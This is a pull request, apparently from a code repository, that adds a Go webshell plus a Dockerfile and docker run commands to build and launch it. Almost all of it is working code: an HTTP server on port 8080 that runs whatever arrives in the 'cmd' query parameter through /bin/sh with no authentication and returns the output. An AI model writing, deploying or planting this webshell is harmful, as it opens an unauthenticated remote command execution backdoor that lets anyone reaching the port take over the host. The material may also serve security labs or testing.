### PR TITLE
webshell base on golang and containerize

### DIFF
--- a/go_frame/Dockerfile
+++ b/go_frame/Dockerfile
@@ -1,0 +1,14 @@
+FROM golang:latest
+
+WORKDIR /app
+
+COPY go.mod ./
+copy example.go ./
+RUN go mod download
+
+#編譯的檔案名=process name
+RUN go build -o /go_webshell
+
+EXPOSE 8080
+
+CMD [ "/go_webshell" ]

--- a/go_frame/example.go
+++ b/go_frame/example.go
@@ -1,0 +1,60 @@
+package main
+
+import (
+   "fmt"
+   "log"
+   "net/http"
+   "os/exec"
+)
+
+var shell = "/bin/sh"
+var shellArg = "-c"
+
+func main() {
+   /*if len(os.Args) != 2 {
+      fmt.Printf("Usage: %s <listenAddress>\n", os.Args[0])
+      fmt.Printf("Example: %s localhost:8080\n", os.Args[0])
+
+      os.Exit(1)
+   }*/
+
+   http.HandleFunc("/", requestHandler)
+   log.Println("Listening for HTTP requests.")
+   err := http.ListenAndServe(":8080", nil)
+   if err != nil {
+      log.Fatal("Error creating server. ", err)
+   }
+}
+
+func requestHandler(writer http.ResponseWriter, request *http.Request) {
+   // Get command to execute from GET query parameters
+   cmd := request.URL.Query().Get("cmd")
+   if cmd == "" {
+      fmt.Fprintln(
+         writer,
+         "No command provided. Example: /?cmd=whoami")
+      return
+   }
+
+   log.Printf("Request from %s: %s\n", request.RemoteAddr, cmd)
+   fmt.Fprintf(writer, "You requested command: %s\n", cmd)
+
+   // Run the command
+   command := exec.Command(shell, shellArg, cmd)
+   output, err := command.Output()
+   if err != nil {
+      fmt.Fprintf(writer, "Error with command.\n%s\n", err.Error())
+   }
+
+   // Write output of command to the response writer interface
+   fmt.Fprintf(writer, "Output: \n%s\n", output)
+}
+
+//expose 8080
+
+//docker 命令
+//sudo docker run -d -p 8080:8080 --rm --name go_webframe go_webshell
+//sudo docker stop go_webframe
+
+//編譯go module
+//go mod init 資料夾名稱(含有*.go)

--- a/go_frame/go.mod
+++ b/go_frame/go.mod
@@ -1,0 +1,3 @@
+module go_frame
+
+go 1.17


### PR DESCRIPTION
- add go base webshell
- Dockerfile to build webshell using go, expose 8080

go webshell base on: [this](https://tonghuaroot.com/2020/01/01/Golang-webshell/)
編譯go module: [this](https://zamhuang.medium.com/golang-%E9%82%84%E5%9C%A8%E6%8A%8A-library-%E6%94%BE%E5%9C%A8%E5%B0%88%E6%A1%88%E8%A3%A1-%E8%A9%B2%E8%B7%9F%E4%B8%8A%E4%BD%BF%E7%94%A8-go-module-%E4%BA%86-4185df23442a)
build go image: [this](https://docs.docker.com/language/golang/build-images/)